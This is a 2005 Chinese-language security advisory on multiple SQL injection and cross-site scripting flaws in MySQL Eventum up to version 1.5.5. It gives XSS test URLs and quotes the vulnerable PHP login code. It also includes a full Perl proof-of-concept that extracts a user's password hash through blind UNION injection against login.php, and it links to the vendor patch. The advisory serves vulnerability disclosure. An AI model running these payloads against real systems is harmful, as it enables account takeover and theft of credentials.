首页 -> 安全研究
安全研究
安全漏洞
MySQL Eventum多个远程SQL注入漏洞
发布日期:2005-08-02
更新日期:2005-08-02
受影响系统:
MySQL AB Eventum <= 1.5.5不受影响系统:
MySQL AB Eventum 1.6描述:
BUGTRAQ ID: 14437
Eventum是一款灵活的问题跟踪系统,用于跟踪入站技术支持或组织任务和漏洞。
Eventum中存在多个SQL注入和跨站脚本漏洞,远程攻击者可能利用这些漏洞非授权访问数据库。
跨站脚本:
http://eventum/view.php?id=1'%22%3E%3Ciframe%3E
http://eventum/list.php?keywords=&users=&category=&release=%22%3E%3Ciframe%3E
http://eventum/get_jsrs_data.php?F=wee%22%3E%3Ciframe%3E
恶意用户可以利用这个漏洞窃取敏感用户信息,或在受害用户的web浏览器环境中生成恶意脚本。
SQL注入:
在/includes/class.auth.php中
/**
* Checks whether the provided password match against the email
* address provided.
*
* @access public
* @param string $email The email address to check for
* @param string $password The password of the user to check for
* @return boolean
*/
function isCorrectPassword($email, $password)
{
$stmt = "SELECT usr_password FROM " . APP_DEFAULT_DB . "." .
APP_TABLE_PREFIX . "
user WHERE usr_email='$email'";
$passwd = $GLOBALS["db_api"]->dbh->getOne($stmt);
if (PEAR::isError($passwd)) {
Error_Handler::logError(array($passwd->getMessage(),
$passwd->getDebugInfo()),
__FILE__, __LINE__);
return false;
} else {
if ($passwd != md5($password)) {
return false;
} else {
return true;
}
}
}
MySQL Eventum没有过滤$email变量,因此如果目标主机使用支持UNION功能的数据库的话,攻击者就可以覆盖返回口令,绕过口令检查。同isCorrectPassword函数使用的userExists()中也存在同样的漏洞。此外还有其他几个SQL注入漏洞:
/reports/custom_fields.php->/includes/class.report.php->getCustomFieldReport()
/reports/custom_fields_graph.php->/includes/class.report.php->getCustomFieldReport()
/manage/releases.php->/includes/class.release.php->insert()
<*来源:James Bercegay (security@gulftech.org)
Joao Prado Maia
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112292193807958&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
use IO::Socket;
use strict;
print "#############################################\n";
print "# MySQL Eventum <= v1.5.5 SQL Injection PoC #\n";
print "# James Bercegay // gulftech.org // 7-28-05 #\n";
print "#############################################\n";
my $host = 'localhost';
my $path = '/eventum/login.php';
my $user = '2';
my $port = 80;
my $pass = '';
my @char = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
print "[*] Trying $host\n";
OUTER: for ( my $i = 1; $i < 33; $i++ )
{
INNER: for ( my $j=0; $j < 16; $j++ )
{
my $used = $char[$j];
my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) || die "[!] Unable to connect to $host\n";
my $post = "cat=login&url=&email=%27+UNION+SELECT+%273355d92c04a3332339b767f9278405ff%27+FROM+eventum_user+WHERE+usr_id=$user+AND+MID(usr_password,$i,1)='$used'%2F*&passwd=dance&Submit=Login";
my $send = "POST $path HTTP/1.1\r\n";
$send .= "Host: $host\r\n";
$send .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\r\n";
$send .= "Connection: Keep-Alive\r\n";
$send .= "Content-type: application/x-www-form-urlencoded\r\n";
$send .= "Content-length: ".length($post)."\r\n\r\n";
$send .= "$post\r\n\r\n";
print $sock $send;
while ( my $line = <$sock> )
{
if ( $line =~ /(.*)err=7(.*)/is )
{
$pass .= $used;
print "[+] Char $i is $used\n";
last INNER;
}
#/if
}
#/while
close($sock);
}
#/for INNER
if ( length($pass) < 1 )
{
print "[!] Host not vulnerable!";
exit;
}
}
#/for OUTER
print "[+] Pass hash is $pass\n";
exit;
--------------080804080206030607000104--
建议:
厂商补丁:
MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://lists.mysql.com/eventum-users/2072
浏览次数:3885
严重程度:0(网友投票)
绿盟科技给您安全的保障